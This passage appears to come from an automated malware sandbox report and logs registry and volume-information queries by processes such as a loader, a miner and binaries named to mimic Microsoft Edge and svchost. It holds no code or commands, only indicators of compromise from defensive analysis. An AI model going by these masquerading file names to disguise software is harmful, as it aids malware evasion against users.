                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\miner2.0.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\services64.exeQueries volume information: C:\Windows\System32\services64.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
